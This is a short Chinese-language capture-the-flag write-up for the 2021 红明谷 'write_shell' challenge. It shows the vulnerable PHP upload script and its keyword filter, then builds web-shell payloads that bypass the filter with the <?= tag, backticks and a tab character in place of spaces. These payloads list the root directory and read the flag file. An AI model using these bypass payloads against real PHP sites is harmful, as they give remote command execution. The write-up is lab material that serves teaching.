[红明谷CTF 2021]write_shell

[红明谷CTF 2021]write_shell

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

可以看到，当action等于pwd的时候，会打印当前目录的路径，当action等于upload的时候，会上传数据到目录路径下的index.php中，而在check函数中也是过滤了很多的关键字，但是没有过滤反引号（`），于是先构造payload显示路径：/?action=pwd

接下来就是让页面显示内容，需要写入<?php system('ls \')?>，但是php、'、空格被过滤了，于是要找新的字符来代替，php过滤成<?= ?>，'用`（反引号）来替换，空格用\t来替换，于是构造出新的payload：/?action=upload&data=<?=`ls\t/`?>，先执行payload，执行完之后要回到路径中查看显示的内容

推测flag在flllllll1112222222lag中，于是用cat命令直接抓取flllllll1112222222lag内容，构造payload：/?action=upload&data=<?=`cat\t/flllllll1112222222lag`?>，执行后仍要返回路径查看，即可得到flag